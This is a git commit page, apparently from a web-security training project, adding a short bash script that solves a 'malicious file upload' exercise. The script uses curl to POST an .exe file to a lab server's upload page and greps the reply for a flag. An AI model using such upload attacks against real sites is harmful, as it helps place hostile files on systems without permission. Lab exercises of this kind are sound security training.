diff options
| author | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 15:43:45 +0100 |
|---|---|---|
| committer | Thomas Vanbesien <tvanbesi@proton.me> | 2026-03-27 15:43:45 +0100 |
| commit | 642f809226c9e25c22c3c97ee12dadfda945f17a (patch) | |
| tree | ec120b0f3f06229db45cb20269bd03e5e212aa4c /Upload malicious file/Resources/upload.bash | |
| parent | 9441ee608adee6b4f1c98cc990fbb55d0f132232 (diff) | |
| download | darkly-642f809226c9e25c22c3c97ee12dadfda945f17a.tar.gz darkly-642f809226c9e25c22c3c97ee12dadfda945f17a.zip | |
Add malicious file upload solution
Diffstat (limited to 'Upload malicious file/Resources/upload.bash')
| -rwxr-xr-x | Upload malicious file/Resources/upload.bash | 6 |
1 files changed, 6 insertions, 0 deletions
diff --git a/Upload malicious file/Resources/upload.bash b/Upload malicious file/Resources/upload.bash new file mode 100755 index 0000000..46b90fc --- /dev/null +++ b/Upload malicious file/Resources/upload.bash @@ -0,0 +1,6 @@ +#!/usr/bin/bash + +curl --silent -X POST \ + 'http://10.0.2.15/?page=upload' \ + --header "Content-Type: multipart/form-data; boundary=----BOUNDARY" \ + --data-binary @yourMom.exe | grep flag |
